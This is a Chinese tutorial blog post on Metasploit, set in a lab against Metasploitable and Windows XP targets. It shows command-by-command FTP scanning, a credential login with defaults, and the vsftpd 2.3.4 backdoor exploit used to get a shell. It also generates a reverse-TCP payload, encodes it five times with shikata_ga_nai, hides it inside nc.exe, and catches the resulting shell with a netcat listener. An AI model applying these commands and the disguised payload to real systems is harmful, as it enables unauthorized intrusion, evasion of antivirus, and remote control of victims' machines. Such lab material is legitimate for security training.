Metasploit framework(三)——exploit模块及payload模块独立实战

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

 

首先说exploit模块及其实战效果:

1、Active exploit (主动)
触发方式:攻击者发起攻击并且发动payload执行,得到shell(即主动提交漏洞利用代码,从而达到利用漏洞)

2、Passive Exploits (被动)
触发方式:诸如客户端访问服务器,当服务器存在漏洞利用代码,而客户端有漏洞,客户端访问服务器被服务器的利用代码攻击,从而造成客户端shell给服务器 。典型的就是社会攻击。

注意:不管什么方法,都是加载payload使攻击效果达到

实战用到的工具:kali、metasploitable靶机、

使用的命令:

- search ftp
- use auxiliary/scanner/ftp/ftp_version
    set RHOSTS 172.20.10.13
    run
- use auxiliary/scanner/ftp/anonymous
    set RHOSTS 172.20.10.13
    run
- use auxiliary/scanner/ftp/ftp_login
    set RHOSTS 172.20.10.13
    set USERNAME msfadmin
    set PASSWORD msfadmin
    run
- search 234
#注意这里的234是ftp_version扫描出来的版本号
-use exploit/unix/ftp/vsftpd_234_backdoor
    set RHOSTS 172.20.10.13
    run
- uname -a

效果图如下:

上面便可。

接下来说直接使用payload达成效果实战演示:

用到的tool:kali、xp

使用到的命令:

- show payload
- use payload/windows/shell_reverse_tcp
    set LHOST 172.20.10.11
-generate -h
-generate -b '\x00\xff' -f exe -e x86/shikata_ga_nai -i 5 -k -x /usr/ share/windows-binaries/nc.exe -o /root/nc.exe       #这里的意思是:去掉payload的坏字符指定为exe格式,然后进行5次加密,指定成注入方式并且注入到一个nc程序中,最后将生成结果导出到/root/nc.exe这个里面。

效果图:

将生成的可执行程序拷贝到xp中: 

 在本机端建立侦听程序:

nc -nvlp 4444

一旦xp中执行nc程序,那么侦听在本机的侦听端口将得到xp反弹回客户端的shell,取得对方shell执行操作。

注意:一旦当可执行程序在xp端被关闭,那么本地shell也将结束。

 

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Jeromeyoung666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值